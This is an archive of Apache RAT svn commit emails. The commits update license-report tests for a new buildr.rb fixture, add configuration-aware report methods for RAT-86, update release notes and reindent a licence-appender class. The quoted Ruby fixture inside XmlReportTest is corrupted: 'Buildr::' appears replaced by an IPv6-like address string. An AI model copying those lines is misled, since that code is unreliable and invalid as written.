incubator/rat/main/trunk/apache-rat-core/src/test/resources/elements/buildr.rb (props changed) - copied unchanged from r1080564, buildr/trunk/lib/buildr.rb Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/ReportTest.java incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/report/xml/XmlReportFactoryTest.java incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/report/xml/XmlReportTest.java Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/ReportTest.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/ReportTest.java?rev=1080567&r1=1080566&r2=1080567&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/ReportTest.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/ReportTest.java Fri Mar 11 13:44:15 2011 @@ -37,9 +37,9 @@ public class ReportTest extends TestCase "Notes: 2\n" + "Binaries: 1\n" + "Archives: 1\n" + - "Standards: 4\n" + + "Standards: 5\n" + "\n" + - "Apache Licensed: 2\n" + + "Apache Licensed: 3\n" + "Generated Documents: 0\n" + "\n" + "JavaDocs are generated and so license header is optional\n" + @@ -71,6 +71,7 @@ public class ReportTest extends TestCase " !????? " + pElementsPath + "/Source.java\n" + " AL " + pElementsPath + "/Text.txt\n" + " AL " + pElementsPath + "/Xml.xml\n" + + " AL " + pElementsPath + "/buildr.rb\n" + " A " + pElementsPath + "/dummy.jar\n" + " !????? " + pElementsPath + "/sub/Empty.txt\n" + " \n" + Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/report/xml/XmlReportFactoryTest.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/report/xml/XmlReportFactoryTest.java?rev=1080567&r1=1080566&r2=1080567&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/report/xml/XmlReportFactoryTest.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/report/xml/XmlReportFactoryTest.java Fri Mar 11 13:44:15 2011 @@ -82,12 +82,14 @@ public class XmlReportFactoryTest extend "</resource>" + "<resource name='" + elementsPath + "/Xml.xml'><type name='standard'/>" + "</resource>" + + "<resource name='" + elementsPath + "/buildr.rb'><type name='standard'/>" + + "</resource>" + "<resource name='" + elementsPath + "/dummy.jar'><type name='archive'/></resource>" + "</rat-report>", output); assertTrue("Is well formed", XmlUtils.isWellFormedXml(output)); assertEquals("Binary files", new Integer(1), statistic.getDocumentCategoryMap().get(MetaData.RAT_DOCUMENT_CATEGORY_VALUE_BINARY)); assertEquals("Notice files", new Integer(2), statistic.getDocumentCategoryMap().get(MetaData.RAT_DOCUMENT_CATEGORY_VALUE_NOTICE)); - assertEquals("Standard files", new Integer(3), statistic.getDocumentCategoryMap().get(MetaData.RAT_DOCUMENT_CATEGORY_VALUE_STANDARD)); + assertEquals("Standard files", new Integer(4), statistic.getDocumentCategoryMap().get(MetaData.RAT_DOCUMENT_CATEGORY_VALUE_STANDARD)); assertEquals("Archives", new Integer(1), statistic.getDocumentCategoryMap().get(MetaData.RAT_DOCUMENT_CATEGORY_VALUE_ARCHIVE)); } } Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/report/xml/XmlReportTest.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/report/xml/XmlReportTest.java?rev=1080567&r1=1080566&r2=1080567&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/report/xml/XmlReportTest.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/report/xml/XmlReportTest.java Fri Mar 11 13:44:15 2011 @@ -140,6 +140,51 @@ public class XmlReportTest extends TestC "--&gt;\n" + "&lt;document/&gt;\n" + "</header-sample><header-type name='?????'/><license-family name='?????'/><type name='standard'/></resource>" + + "<resource name='" + elementsPath + "/buildr.rb'><header-sample># Licensed to the Apache Software Foundation (ASF) under one or more\n" + +"# contributor license agreements. See the NOTICE file distributed with this\n" + +"# work for additional information regarding copyright ownership. The ASF\n" + +"# licenses this file to you under the Apache License, Version 2.0 (the\n" + +"# \"License\"); you may not use this file except in compliance with the License.\n" + +"# You may obtain a copy of the License at\n" + +"#\n" + +"# http://www.apache.org/licenses/LICENSE-2.0\n" + +"#\n" + +"# Unless required by applicable law or agreed to in writing, software\n" + +"# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n" + +"# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n" + +"# License for the specific language governing permissions and limitations under\n" + +"# the License.\n" + +"\n" + +"unless defined?(Buildracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bVERSION)\n" + +" require 'buildr/version'\n" + +"end\n" + +"\n" + +"require 'buildr/core'\n" + +"require 'buildr/packaging'\n" + +"require 'buildr/java'\n" + +"require 'buildr/ide'\n" + +"require 'buildr/shell'\n" + +"require 'buildr/run'\n" + +"\n" + +"# Methods defined in Buildr are both instance methods (e.g. when included in Project)\n" + +"# and class methods when invoked like Buildr.artifacts().\n" + +"module Buildr ; extend self ; end\n" + +"\n" + +"# The Buildfile object (self) has access to all the Buildr methods and constants.\n" + +"class &lt;&lt; self ; include Buildr ; end\n" + +"\n" + +"# All modules defined under Buildracf:4db6:5e0b:f386:43a5:35d7:718d:3c8b* can be referenced without Buildracf:4db6:5e0b:f386:43a5:35d7:718d:3c8b prefix\n" + +"# unless a conflict exists (e.g. Buildracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRSpec vs acf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRSpec)\n" + +"class Object #:nodoc:\n" + +" Buildr.constants.each do |name|\n" + +" const = Buildr.const_get(name)\n" + +" if const.is_a?(Module)\n" + +" const_set name, const unless const_defined?(name)\n" + +" end\n" + +" end\n" + +"end\n" + +"\n" + + "</header-sample><header-type name='?????'/><license-family name='?????'/><type name='standard'/></resource>" + "<resource name='" + elementsPath + "/dummy.jar'><type name='archive'/></resource>" + "<resource name='" + elementsPath + "/sub/Empty.txt'><header-sample>\n</header-sample><header-type name='?????'/><license-family name='?????'/><type name='standard'/></resource>" + "</rat-report>", output); Propchange: incubator/rat/main/trunk/apache-rat-core/src/test/resources/elements/buildr.rb ------------------------------------------------------------------------------ svn:eol-style = native From [email protected] Fri Mar 11 14:12:32 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76144 invoked from network); 11 Mar 2011 14:12:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Mar 2011 14:12:32 -0000 Received: (qmail 37299 invoked by uid 500); 11 Mar 2011 14:12:32 -0000 Delivered-To: [email protected] Received: (qmail 37274 invoked by uid 500); 11 Mar 2011 14:12:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37267 invoked by uid 99); 11 Mar 2011 14:12:32 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 14:12:32 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 14:12:31 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 84FB423889B9; Fri, 11 Mar 2011 14:12:08 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1080572 - /incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/Report.java Date: Fri, 11 Mar 2011 14:12:08 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: bodewig Date: Fri Mar 11 14:12:08 2011 New Revision: 1080572 URL: http://svn.apache.org/viewvc?rev=1080572&view=rev Log: CLI ignores configuration unless a stylesheet is specified. RAT-86 Modified: incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/Report.java Modified: incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/Report.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/Report.java?rev=1080572&r1=1080571&r2=1080572&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/Report.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/Report.java Fri Mar 11 14:12:08 2011 @@ -96,10 +96,10 @@ public class Report { } if (cl.hasOption('x')) { - report.report(System.out); + report.report(System.out, configuration); } else { if (!cl.hasOption(STYLESHEET_CLI)) { - report.styleReport(System.out); + report.styleReport(System.out, configuration); } else { String[] style = cl.getOptionValues(STYLESHEET_CLI); if (style.length != 1) { @@ -230,11 +230,23 @@ public class Report { this.inputFileFilter = inputFileFilter; } + /** + * @deprecated use the two-arg version instead + */ public ClaimStatistic report(PrintStream out) throws Exception { + final ReportConfiguration configuration = new ReportConfiguration(); + configuration.setHeaderMatcher(Defaults.createDefaultMatcher()); + return report(out, configuration); + } + + /** + * @since RAT 0.8 + */ + public ClaimStatistic report(PrintStream out, + ReportConfiguration configuration) + throws Exception { final IReportable base = getDirectory(out); if (base != null) { - final ReportConfiguration configuration = new ReportConfiguration(); - configuration.setHeaderMatcher(Defaults.createDefaultMatcher()); return report(base, new OutputStreamWriter(out), configuration); } return null; @@ -269,13 +281,29 @@ public class Report { * * @param out - the output stream to recieve the styled report * @throws Exception + * @deprecated use the two-arg version instead */ public void styleReport(PrintStream out) throws Exception { + final ReportConfiguration configuration = new ReportConfiguration(); + configuration.setHeaderMatcher(Defaults.createDefaultMatcher()); + styleReport(out, configuration); + } + + /** + * Output a report in the default style and default licence + * header matcher. + * + * @param out - the output stream to recieve the styled report + * @param configuration the configuration to use + * @throws Exception + * @since RAT 0.8 + */ + public void styleReport(PrintStream out, + ReportConfiguration configuration) + throws Exception { final IReportable base = getDirectory(out); if (base != null) { InputStream style = Defaults.getDefaultStyleSheet(); - final ReportConfiguration configuration = new ReportConfiguration(); - configuration.setHeaderMatcher(Defaults.createDefaultMatcher()); report(out, base, style, configuration); } } From [email protected] Fri Mar 11 16:36:47 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 68589 invoked from network); 11 Mar 2011 16:36:47 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Mar 2011 16:36:47 -0000 Received: (qmail 19956 invoked by uid 500); 11 Mar 2011 16:36:47 -0000 Delivered-To: [email protected] Received: (qmail 19930 invoked by uid 500); 11 Mar 2011 16:36:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19923 invoked by uid 99); 11 Mar 2011 16:36:46 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 16:36:46 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 16:36:46 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id F1BED23889E1; Fri, 11 Mar 2011 16:36:23 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1080652 - /incubator/rat/main/trunk/RELEASE_NOTES.txt Date: Fri, 11 Mar 2011 16:36:23 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: bodewig Date: Fri Mar 11 16:36:23 2011 New Revision: 1080652 URL: http://svn.apache.org/viewvc?rev=1080652&view=rev Log: record RAT-86 Modified: incubator/rat/main/trunk/RELEASE_NOTES.txt Modified: incubator/rat/main/trunk/RELEASE_NOTES.txt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/RELEASE_NOTES.txt?rev=1080652&r1=1080651&r2=1080652&view=diff ============================================================================== --- incubator/rat/main/trunk/RELEASE_NOTES.txt (original) +++ incubator/rat/main/trunk/RELEASE_NOTES.txt Fri Mar 11 16:36:23 2011 @@ -1,6 +1,9 @@ RAT 0.8 ======= * Issues Resolved (see http://issues.apache.org/jira): + * Bug: + * RAT-86 CLI doesn't allow adding of licenses unless a custom + stylesheet has been specified * Improvement: * RAT-79 Support automatic addition of license headers to Velocity templates From [email protected] Fri Mar 11 16:40:11 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 71402 invoked from network); 11 Mar 2011 16:40:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Mar 2011 16:40:11 -0000 Received: (qmail 30557 invoked by uid 500); 11 Mar 2011 16:40:11 -0000 Delivered-To: [email protected] Received: (qmail 30534 invoked by uid 500); 11 Mar 2011 16:40:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30527 invoked by uid 99); 11 Mar 2011 16:40:11 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 16:40:11 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 16:40:10 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 6EEF023888CB; Fri, 11 Mar 2011 16:39:47 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1080656 - /incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java Date: Fri, 11 Mar 2011 16:39:47 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: bodewig Date: Fri Mar 11 16:39:47 2011 New Revision: 1080656 URL: http://svn.apache.org/viewvc?rev=1080656&view=rev Log: whitespace changes only Modified: incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java Modified: incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java?rev=1080656&r1=1080655&r2=1080656&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java Fri Mar 11 16:39:47 2011 @@ -32,242 +32,242 @@ import java.io.IOException; * */ public abstract class AbstractLicenceAppender { - private static final int TYPE_UNKNOWN = 0; - private static final int TYPE_JAVA = 1; - private static final int TYPE_XML = 2; - private static final int TYPE_HTML = 3; - private static final int TYPE_CSS = 4; - private static final int TYPE_JAVASCRIPT = 5; - private static final int TYPE_APT = 6; - private static final int TYPE_PROPERTIES = 7; - private static final int TYPE_PYTHON = 8; - private static final int TYPE_C = 9; - private static final int TYPE_H = 10; - private static final int TYPE_SH = 11; - private static final int TYPE_BAT = 12; - private static final int TYPE_VM = 13; - private boolean isForced; - - public AbstractLicenceAppender() { - super(); - } - - /** - * Append the default licence header to the supplied document. - * - * @param document - * @throws IOException - * if there is a problem either reading or writing the file - */ - public void append(File document) throws IOException { - int type = getType(document); - if (type == TYPE_UNKNOWN) { - return; - } - File newDocument = new File(document.getAbsolutePath() + ".new"); - FileWriter writer = new FileWriter(newDocument); - - FileReader fr = new FileReader(document); - BufferedReader br = new BufferedReader(fr); - - if (type == TYPE_CSS - || type == TYPE_JAVASCRIPT - || type == TYPE_APT - || type == TYPE_PROPERTIES - || type == TYPE_C - || type == TYPE_H - || type == TYPE_HTML - || type == TYPE_VM) { - writer.write(getLicenceHeader(document)); - writer.write('\n'); - } - - String line; - boolean first = true; - while ((line = br.readLine()) != null) { - if (first && type == TYPE_PYTHON) { - doFirstLine(document, writer, line, "#!/usr/bin"); - } else if (first && type == TYPE_BAT) { - doFirstLine(document, writer, line, "@echo off"); - } else if (first && type == TYPE_SH) { - doFirstLine(document, writer, line, "#!/bin"); - } else { - writer.write(line); - writer.write('\n'); - } - - if (type == TYPE_JAVA && line.startsWith("package ")) { - writer.write(getLicenceHeader(document)); - writer.write('\n'); - } - if (type == TYPE_XML && line.startsWith("<?xml ")) { - writer.write(getLicenceHeader(document)); - writer.write('\n'); - } - first = false; - } - br.close(); - writer.close(); - - if (isForced) { - document.delete(); - boolean renamed = newDocument.renameTo(document.getAbsoluteFile()); - if (!renamed) { - System.err.println("Failed to rename new file, original file remains unchanged."); - } - } - } - - /** - * Check first line for specified text and process. - */ - private void doFirstLine(File document, FileWriter writer, String line, String lookfor) throws IOException { - if (line.startsWith(lookfor)) { - writer.write(line); - writer.write('\n'); - writer.write(getLicenceHeader(document)); - } else { - writer.write(getLicenceHeader(document)); - writer.write(line); - writer.write('\n'); - } - } - - /** - * Detect the type of document. - * - * @param document - * @return not null - * @TODO use existing mechanism to detect the type of a file and record it in the report output, thus we will not need this duplication here. - */ - protected int getType(File document) { - if (document.getPath().endsWith(".java")) { - return TYPE_JAVA; - } else if (document.getPath().endsWith(".xml") || document.getPath().endsWith(".xsl")) { - return TYPE_XML; - } else if (document.getPath().endsWith(".html") || document.getPath().endsWith(".htm")) { - return TYPE_HTML; - } else if (document.getPath().endsWith(".rdf") || document.getPath().endsWith(".xsl")) { - return TYPE_XML; - } else if (document.getPath().endsWith(".css")) { - return TYPE_CSS; - } else if (document.getPath().endsWith(".js")) { - return TYPE_JAVASCRIPT; - } else if (document.getPath().endsWith(".apt")) { - return TYPE_APT; - } else if (document.getPath().endsWith(".properties")) { - return TYPE_PROPERTIES; - } else if (document.getPath().endsWith(".py")) { - return TYPE_PYTHON; - } else if (document.getPath().endsWith(".c")) { - return TYPE_C; - } else if (document.getPath().endsWith(".h")) { - return TYPE_H; - } else if (document.getPath().endsWith(".sh")) { - return TYPE_SH; - } else if (document.getPath().endsWith(".bat")) { - return TYPE_BAT; - } else if (document.getPath().endsWith(".vm")) { - return TYPE_VM; - } - return TYPE_UNKNOWN; - } - - /** - * Set the force flag on this appender. If this flag is set - * to true then files will be modified directly, otherwise - * new files will be created alongside the existing files. - * - * @param b - */ - public void setForce(boolean b) { - isForced = b; - } - - /** - * Get the licence header for a document. - */ - public abstract String getLicenceHeader(File document); - - /** - * Get the first line of the licence header formatted - * for the given type of file. - * - * @param type the type of file, see the TYPE_* constants - * @return not null - */ - protected String getFirstLine(int type) { - switch (type) { - case TYPE_JAVA: return "/*\n"; - case TYPE_C: return "/*\n"; - case TYPE_H: return "/*\n"; - case TYPE_XML: return "<!--\n"; - case TYPE_HTML: return "<!--\n"; - case TYPE_CSS: return "/*\n"; - case TYPE_JAVASCRIPT: return "/*\n"; - case TYPE_APT: return "~~\n"; - case TYPE_PROPERTIES: return "#\n"; - case TYPE_PYTHON: return "#\n"; - case TYPE_SH: return "#\n"; - case TYPE_BAT: return "rem\n"; - default: return ""; - } - } - - - /** - * Get the last line of the licence header formatted - * for the given type of file. - * - * @param type the type of file, see the TYPE_* constants - * @return not null - */ - protected String getLastLine(int type) { - switch (type) { - case TYPE_JAVA: return " */\n"; - case TYPE_C: return " */\n"; - case TYPE_H: return " */\n"; - case TYPE_XML: return "-->\n"; - case TYPE_HTML: return "-->\n"; - case TYPE_CSS: return " */\n"; - case TYPE_JAVASCRIPT: return " */\n"; - case TYPE_APT: return "~~\n"; - case TYPE_PROPERTIES: return "#\n"; - case TYPE_PYTHON: return "#\n"; - case TYPE_SH: return "#\n"; - case TYPE_BAT: return "rem\n"; - default: return ""; - } - } - - - /** - * Get a line of the licence header formatted - * for the given type of file. - * - * @param type the type of file, see the TYPE_* constants - * @param content the content for this line - * @return not null - */ - protected String getLine(int type, String content) { - if (content != null && content.length() > 0) { - content = " " + content; - } - switch (type) { - case TYPE_JAVA: return " *" + content + "\n"; - case TYPE_C: return " *" + content + "\n"; - case TYPE_H: return " *" + content + "\n"; - case TYPE_XML: return content + "\n"; - case TYPE_HTML: return content + "\n"; - case TYPE_CSS: return " *" + content + "\n"; - case TYPE_JAVASCRIPT: return " *" + content + "\n"; - case TYPE_APT: return "~~" + content + "\n"; - case TYPE_PROPERTIES: return "#" + content + "\n"; - case TYPE_PYTHON: return "#" + content + "\n"; - case TYPE_SH: return "#" + content + "\n"; - case TYPE_BAT: return "rem" + content + "\n"; - case TYPE_VM: return "##" + content + "\n"; - default: return ""; + private static final int TYPE_UNKNOWN = 0; + private static final int TYPE_JAVA = 1; + private static final int TYPE_XML = 2; + private static final int TYPE_HTML = 3; + private static final int TYPE_CSS = 4; + private static final int TYPE_JAVASCRIPT = 5; + private static final int TYPE_APT = 6; + private static final int TYPE_PROPERTIES = 7; + private static final int TYPE_PYTHON = 8; + private static final int TYPE_C = 9; + private static final int TYPE_H = 10; + private static final int TYPE_SH = 11; + private static final int TYPE_BAT = 12; + private static final int TYPE_VM = 13; + private boolean isForced; + + public AbstractLicenceAppender() { + super(); + } + + /** + * Append the default licence header to the supplied document. + * + * @param document + * @throws IOException + * if there is a problem either reading or writing the file + */ + public void append(File document) throws IOException { + int type = getType(document); + if (type == TYPE_UNKNOWN) { + return; + } + File newDocument = new File(document.getAbsolutePath() + ".new"); + FileWriter writer = new FileWriter(newDocument); + + FileReader fr = new FileReader(document); + BufferedReader br = new BufferedReader(fr); + + if (type == TYPE_CSS + || type == TYPE_JAVASCRIPT + || type == TYPE_APT + || type == TYPE_PROPERTIES + || type == TYPE_C + || type == TYPE_H + || type == TYPE_HTML + || type == TYPE_VM) { + writer.write(getLicenceHeader(document)); + writer.write('\n'); + } + + String line; + boolean first = true; + while ((line = br.readLine()) != null) { + if (first && type == TYPE_PYTHON) { + doFirstLine(document, writer, line, "#!/usr/bin"); + } else if (first && type == TYPE_BAT) { + doFirstLine(document, writer, line, "@echo off"); + } else if (first && type == TYPE_SH) { + doFirstLine(document, writer, line, "#!/bin"); + } else { + writer.write(line); + writer.write('\n'); + } + + if (type == TYPE_JAVA && line.startsWith("package ")) { + writer.write(getLicenceHeader(document)); + writer.write('\n'); + } + if (type == TYPE_XML && line.startsWith("<?xml ")) { + writer.write(getLicenceHeader(document)); + writer.write('\n'); + } + first = false; + } + br.close(); + writer.close(); + + if (isForced) { + document.delete(); + boolean renamed = newDocument.renameTo(document.getAbsoluteFile()); + if (!renamed) { + System.err.println("Failed to rename new file, original file remains unchanged."); + } + } + } + + /** + * Check first line for specified text and process. + */ + private void doFirstLine(File document, FileWriter writer, String line, String lookfor) throws IOException { + if (line.startsWith(lookfor)) { + writer.write(line); + writer.write('\n'); + writer.write(getLicenceHeader(document)); + } else { + writer.write(getLicenceHeader(document)); + writer.write(line); + writer.write('\n'); + } + } + + /** + * Detect the type of document. + * + * @param document + * @return not null + * @TODO use existing mechanism to detect the type of a file and record it in the report output, thus we will not need this duplication here. + */ + protected int getType(File document) { + if (document.getPath().endsWith(".java")) { + return TYPE_JAVA; + } else if (document.getPath().endsWith(".xml") || document.getPath().endsWith(".xsl")) { + return TYPE_XML; + } else if (document.getPath().endsWith(".html") || document.getPath().endsWith(".htm")) { + return TYPE_HTML; + } else if (document.getPath().endsWith(".rdf") || document.getPath().endsWith(".xsl")) { + return TYPE_XML; + } else if (document.getPath().endsWith(".css")) { + return TYPE_CSS; + } else if (document.getPath().endsWith(".js")) { + return TYPE_JAVASCRIPT; + } else if (document.getPath().endsWith(".apt")) { + return TYPE_APT; + } else if (document.getPath().endsWith(".properties")) { + return TYPE_PROPERTIES; + } else if (document.getPath().endsWith(".py")) { + return TYPE_PYTHON; + } else if (document.getPath().endsWith(".c")) { + return TYPE_C; + } else if (document.getPath().endsWith(".h")) { + return TYPE_H; + } else if (document.getPath().endsWith(".sh")) { + return TYPE_SH; + } else if (document.getPath().endsWith(".bat")) { + return TYPE_BAT; + } else if (document.getPath().endsWith(".vm")) { + return TYPE_VM; + } + return TYPE_UNKNOWN; + } + + /** + * Set the force flag on this appender. If this flag is set + * to true then files will be modified directly, otherwise + * new files will be created alongside the existing files. + * + * @param b + */ + public void setForce(boolean b) { + isForced = b; + } + + /** + * Get the licence header for a document. + */ + public abstract String getLicenceHeader(File document); + + /** + * Get the first line of the licence header formatted + * for the given type of file. + * + * @param type the type of file, see the TYPE_* constants + * @return not null + */ + protected String getFirstLine(int type) { + switch (type) { + case TYPE_JAVA: return "/*\n"; + case TYPE_C: return "/*\n"; + case TYPE_H: return "/*\n"; + case TYPE_XML: return "<!--\n"; + case TYPE_HTML: return "<!--\n"; + case TYPE_CSS: return "/*\n"; + case TYPE_JAVASCRIPT: return "/*\n"; + case TYPE_APT: return "~~\n"; + case TYPE_PROPERTIES: return "#\n"; + case TYPE_PYTHON: return "#\n"; + case TYPE_SH: return "#\n"; + case TYPE_BAT: return "rem\n"; + default: return ""; + } + } + + + /** + * Get the last line of the licence header formatted + * for the given type of file. + * + * @param type the type of file, see the TYPE_* constants + * @return not null + */ + protected String getLastLine(int type) { + switch (type) { + case TYPE_JAVA: return " */\n"; + case TYPE_C: return " */\n"; + case TYPE_H: return " */\n"; + case TYPE_XML: return "-->\n"; + case TYPE_HTML: return "-->\n"; + case TYPE_CSS: return " */\n"; + case TYPE_JAVASCRIPT: return " */\n"; + case TYPE_APT: return "~~\n"; + case TYPE_PROPERTIES: return "#\n"; + case TYPE_PYTHON: return "#\n"; + case TYPE_SH: return "#\n"; + case TYPE_BAT: return "rem\n"; + default: return ""; + } + } + + + /** + * Get a line of the licence header formatted + * for the given type of file. + * + * @param type the type of file, see the TYPE_* constants + * @param content the content for this line + * @return not null + */ + protected String getLine(int type, String content) { + if (content != null && content.length() > 0) { + content = " " + content; + } + switch (type) { + case TYPE_JAVA: return " *" + content + "\n"; + case TYPE_C: return " *" + content + "\n"; + case TYPE_H: return " *" + content + "\n"; + case TYPE_XML: return content + "\n"; + case TYPE_HTML: return content + "\n"; + case TYPE_CSS: return " *" + content + "\n"; + case TYPE_JAVASCRIPT: return " *" + content + "\n"; + case TYPE_APT: return "~~" + content + "\n"; + case TYPE_PROPERTIES: return "#" + content + "\n"; + case TYPE_PYTHON: return "#" + content + "\n"; + case TYPE_SH: return "#" + content + "\n"; + case TYPE_BAT: return "rem" + content + "\n"; + case TYPE_VM: return "##" + content + "\n"; + default: return ""; + } } - } } From [email protected] Fri Mar 11 16:55:00 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 18591 invoked from network); 11 Mar 2011 16:55:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Mar 2011 16:55:00 -0000 Received: (qmail 55549 invoked by uid 500); 11 Mar 2011 16:55:00 -0000 Delivered-To: [email protected] Received: (qmail 55525 invoked by uid 500); 11 Mar 2011 16:55:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55518 invoked by uid 99); 11 Mar 2011 16:55:00 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 16:55:00 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 16:54:59 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 0AC3323888CB; Fri, 11 Mar 2011 16:54:37 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1080664 - /incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Date: Fri, 11 Mar 2011 16:54:36 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: bodewig Date: Fri Mar 11 16:54:36 2011 New Revision: 1080664 URL: http://svn.apache.org/viewvc?rev=1080664&view=rev Log: typo Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Modified: 